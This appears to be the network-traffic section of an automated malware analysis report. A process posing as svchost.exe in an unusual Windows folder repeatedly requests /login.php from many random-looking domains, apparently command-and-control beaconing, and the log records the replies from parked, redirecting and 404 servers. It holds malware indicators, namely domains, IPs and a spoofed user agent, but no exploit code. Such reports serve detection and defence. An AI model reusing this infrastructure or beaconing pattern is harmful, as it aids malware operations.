                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.288753986 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.664972067 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.740748882 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:49.127126932 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:48 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  14192.168.2.64972985.17.31.122801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.839247942 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  15192.168.2.64973145.79.19.196801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.695207119 CET300OUTGET / HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww8.galyqaz.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:50:31.178309917 CET191INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                  server: openresty/1.13.6.1
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  content-type: text/plain
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 46 0d 0a 49 6e 76 61 6c 69 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: FInvalid Request0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  16192.168.2.64973364.190.63.136801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.616396904 CET300OUTGET / HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww3.galyqaz.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234577894 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:33 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:50:33 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-jngxs
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 65 76 63 37 4e 35 46 66 55 4f 6d 66 31 33 4e 6c 2b 38 44 37 2b 30 69 72 48 49 36 43 35 77 58 79 6a 67 76 7a 4a 6e 2b 6c 42 33 45 31 51 66 6a 72 2f 62 59 7a 31 30 4b 58 44 50 41 4a 53 78 37 36 72 67 71 34 47 58 42 48 5a 75 69 64 51 52 4d 37 33 4f 6e 67 5a 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 6c 79 71 61 7a 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_evc7N5FfUOmf13Nl+8D7+0irHI6C5wXyjgvzJn+lB3E1Qfjr/bYz10KXDPAJSx76rgq4GXBHZuidQRM73OngZw==><head><meta charset="utf-8"><title>galyqaz.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;galyqaz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! galyqaz.com is your first and bes
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234608889 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                                  Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, galyqaz.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234620094 CET424INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f
                                                                                                                                                                                                                  Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234662056 CET1236INData Raw: 73 65 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30
                                                                                                                                                                                                                  Data Ascii: set]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234896898 CET1236INData Raw: 74 65 6e 74 2d 62 75 79 62 6f 78 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 0d 0a 31 30 38 32 0d 0a 6c 65 66 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e
                                                                                                                                                                                                                  Data Ascii: tent-buybox{display:inline-block;text-align:1082left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decorat
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234919071 CET1236INData Raw: 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 7b
                                                                                                                                                                                                                  Data Ascii: er-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#949494}.container-cookie-me
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234930038 CET1236INData Raw: 6e 69 74 69 61 6c 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68
                                                                                                                                                                                                                  Data Ascii: nitial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;b
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.234941006 CET1236INData Raw: 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f
                                                                                                                                                                                                                  Data Ascii: ff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__sl
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.235142946 CET1236INData Raw: 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 61 64 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 77 69 64 74
                                                                                                                                                                                                                  Data Ascii: relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:47px;flex-grow:1;width:60px}.container-content__container-ads{margin-top:2.5%}.c
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.235155106 CET1236INData Raw: 31 30 70 78 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75
                                                                                                                                                                                                                  Data Ascii: 10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-ti
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.239533901 CET1236INData Raw: 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c
                                                                                                                                                                                                                  Data Ascii: -link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-elemen576t-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  17192.168.2.64973913.248.169.48801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.370172024 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: pupydeq.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.801198959 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: openresty
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:33 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 114
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  18192.168.2.649740188.114.97.3801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.700877905 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.460958004 CET793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vvbW73Eg9A02F7wNDgrqlkOJW0c2zScboJeBTmcMDmTd%2Bw3WFoKnryQuX8U9gyHGk6KrLuog8vGhjib9oTew2Qivtq4gpTE2R2qM90o%2Bx7wcmbaDU8BM6Gbzd8EKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102016e8017cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1608&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.461952925 CET168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                  Nov 11, 2024 18:50:34.461971998 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.289581060 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:36.618305922 CET984INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XK%2BMnF7sNiYUe%2FjcQXZqMuhl00uhlxf8M%2FVu5UoT7vlyXLjYUxgQfozlvto9smQqs%2FAQ2qkmr4ufPXMJ2ZPOw3QVdQ6iRma6cLoBtBr14%2Fd8VI7IwaL9P%2FZ7%2Bi7wA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10202509fc7cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=966&recv_bytes=486&delivery_rate=1522074&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.300067902 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.661499977 CET978INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:52 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://lysyvan.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNgRxi8fN4zf7vGaeTiE1E8IrmJrjeuMbrMQaZFBS4hpjBt6R%2BWjVn7AqhGvdX49X%2BwieJq%2B73kgObOJ8d0gJJ0NQFL34BekHzG1lZfoZl5wcxr1CFKuyLtMDV4Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10208918377cac-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&sent=9&recv=11&lost=0&retrans=0&sent_bytes=1950&recv_bytes=729&delivery_rate=2509532&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
